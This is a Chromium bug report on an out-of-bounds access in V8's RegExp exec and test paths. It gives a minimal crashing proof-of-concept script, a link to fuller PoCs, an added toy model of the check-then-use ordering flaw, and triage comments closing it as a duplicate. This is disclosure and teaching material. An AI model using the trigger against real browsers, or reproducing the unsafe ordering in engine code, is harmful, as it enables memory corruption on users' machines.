Out-of-bounds access in RegExp.prototype.exec
Reported by ramiibra...@gmail.com, Jul 3 2017
Issue description
There is an out-of-bounds access in RegExp.prototype.exec and RegExp.prototype.test. The code defined in BranchIfFastRegExp checks whether a regular expression object has the default map; however, it is possible to alter the map after this check has been performed. This can cause inline fields, such as lastIndex, to be changed to dictionary properties. This will cause out-of-bounds reads and writes the next time lastIndex is accessed on the fast path.
A minimal PoC is as follows, and two full PoCs (one for test and one for exec) are attached.
var re;
function f() {
  for (var i = 0; i < 100; i++) {
    re["test" + i] = 0x77777777; // make a dict
  }
  return 0;
}
re = /-/g;
var str = '2016-01-02';
re.lastIndex = {valueOf : f}; // valueOf runs when lastIndex is coerced, after the fast-path check
var result = re.exec(str);
This PoC crashes on google-chrome-beta on Linux.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42286.zip
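The check-then-use ordering the report describes, modelled in plain JavaScript as an added example (not V8 code and not the reporter's PoC): a toy fast path that checks the object's shape, then coerces lastIndex (which runs valueOf), then trusts the stale check, beside an ordering that coerces first and picks the path afterwards. Every name here (FAST_MAP, execBuggy, execFixed, migrateToDictionary, hostileLastIndex) is invented for the model, and the "fixed" ordering illustrates the general remedy rather than V8's actual patch.

```javascript
// Toy model (added example, not V8 code); all names here are invented.
const FAST_MAP = "fast";        // stand-in for the default RegExp map
const DICT_MAP = "dictionary";  // stand-in for a dictionary-mode map
const LAST_INDEX_SLOT = 0;      // index of lastIndex in inline field storage
function makeRegExp(lastIndex) {
  return { map: FAST_MAP, inline: [lastIndex], dict: null };
}
// Simulates ToLength(): Number() calls valueOf() on objects, i.e. user code runs.
function toLength(v) {
  const n = Number(v);
  return n > 0 ? Math.floor(n) : 0;
}
// Simulates the property storm in the PoC: the object leaves its fast shape
// and lastIndex moves from inline storage into a dictionary.
function migrateToDictionary(re) {
  re.dict = new Map([["lastIndex", re.inline[LAST_INDEX_SLOT]]]);
  re.inline = [];   // inline storage no longer exists
  re.map = DICT_MAP;
}
// Shape-aware accessors, as a slow path would use.
function getLastIndex(re) {
  return re.map === FAST_MAP ? re.inline[LAST_INDEX_SLOT] : re.dict.get("lastIndex");
}
function setLastIndex(re, n) {
  if (re.map === FAST_MAP) re.inline[LAST_INDEX_SLOT] = n; else re.dict.set("lastIndex", n);
}

// Buggy ordering: shape check, side-effecting coercion, then a raw inline
// access that trusts the stale check (in C++ this write lands out of bounds).
function execBuggy(re) {
  if (re.map !== FAST_MAP) { setLastIndex(re, toLength(getLastIndex(re)) + 1); return "slow"; }
  const idx = toLength(re.inline[LAST_INDEX_SLOT]);  // valueOf may change the shape
  re.inline[LAST_INDEX_SLOT] = idx + 1;              // storage may be gone by now
  return "fast";
}

// Safer ordering: run the user-observable coercion first, then choose the path
// from the shape the object actually has afterwards.
function execFixed(re) {
  const idx = toLength(getLastIndex(re));
  if (re.map !== FAST_MAP) { setLastIndex(re, idx + 1); return "slow"; }
  re.inline[LAST_INDEX_SLOT] = idx + 1;
  return "fast";
}

// A lastIndex whose valueOf changes the object's shape mid-operation (the PoC's trick).
function hostileLastIndex(re) {
  return { valueOf() { migrateToDictionary(re); return 3; } };
}
```

With the buggy ordering the write goes to inline storage that no longer backs the object, so the dictionary copy of lastIndex never sees it; with the fixed ordering the same input simply takes the slow path.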
Comment 1 by ClusterFuzz, Jul 3 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=5435397424545792.
Jul 3 2017
This appears to be an exact duplicate of Issue 708247 and does not appear to crash in current versions of Chrome. Please explain why you've filed this bug?
Jul 10 2017
Close as WontFix.
Oct 17 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot